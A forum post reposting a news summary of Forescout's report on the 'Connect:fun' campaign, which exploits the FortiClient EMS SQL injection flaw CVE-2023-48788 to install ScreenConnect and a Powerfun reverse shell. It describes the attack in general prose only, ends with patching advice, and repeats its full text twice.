Father
Professional
- Messages
- 2,602
- Reaction score
- 776
- Points
- 113
The negligence of administrators leads to theft of corporate data.
Forescout has discovered a new campaign that exploits a vulnerability in Fortinet FortiClient EMS devices to spread malware.
The SQL injection vulnerability CVE-2023-48788 (CVSS score: 9.8) allows an unauthorized attacker to execute code using specially crafted queries. The attack does not require user interaction and is fairly easy to implement.
Forescout tracks a campaign codenamed Connect:fun due to the use of ScreenConnect and Powerfun programs after hacking. The attack targeted an unnamed media company whose vulnerable FortiClient EMS device was available on the Internet.
Recall that on March 21, the network published a PoC exploit for this vulnerability. On March 25, the exploit ran PowerShell code that loaded the Metasploit Powerfun script and initiated a reverse connection to a different IP address. It was also revealed that SQL queries were used to download ScreenConnect from a remote domain via the certutil utility, after which the program was installed and established communication with the management server.
Forescout notes that hackers active since at least 2022 specialize in attacks on Fortinet devices, using Vietnamese and German languages in their infrastructure. The activity of cybercriminals indicates the presence of a manual component in attacks, which is confirmed by numerous unsuccessful attempts to download and install programs, as well as long pauses between attempts. This confirms that we are talking about a specialized campaign, and not about mass automated attacks.
Companies are encouraged to install Fortinet patches to neutralize threats, monitor suspicious traffic, and use firewalls to block potentially malicious requests.
Forescout has discovered a new campaign that exploits a vulnerability in Fortinet FortiClient EMS devices to spread malware.
The SQL injection vulnerability CVE-2023-48788 (CVSS score: 9.8) allows an unauthorized attacker to execute code using specially crafted queries. The attack does not require user interaction and is fairly easy to implement.
Forescout tracks a campaign codenamed Connect:fun due to the use of ScreenConnect and Powerfun programs after hacking. The attack targeted an unnamed media company whose vulnerable FortiClient EMS device was available on the Internet.
Recall that on March 21, the network published a PoC exploit for this vulnerability. On March 25, the exploit ran PowerShell code that loaded the Metasploit Powerfun script and initiated a reverse connection to a different IP address. It was also revealed that SQL queries were used to download ScreenConnect from a remote domain via the certutil utility, after which the program was installed and established communication with the management server.
Forescout notes that hackers active since at least 2022 specialize in attacks on Fortinet devices, using Vietnamese and German languages in their infrastructure. The activity of cybercriminals indicates the presence of a manual component in attacks, which is confirmed by numerous unsuccessful attempts to download and install programs, as well as long pauses between attempts. This confirms that we are talking about a specialized campaign, and not about mass automated attacks.
Companies are encouraged to install Fortinet patches to neutralize threats, monitor suspicious traffic, and use firewalls to block potentially malicious requests.
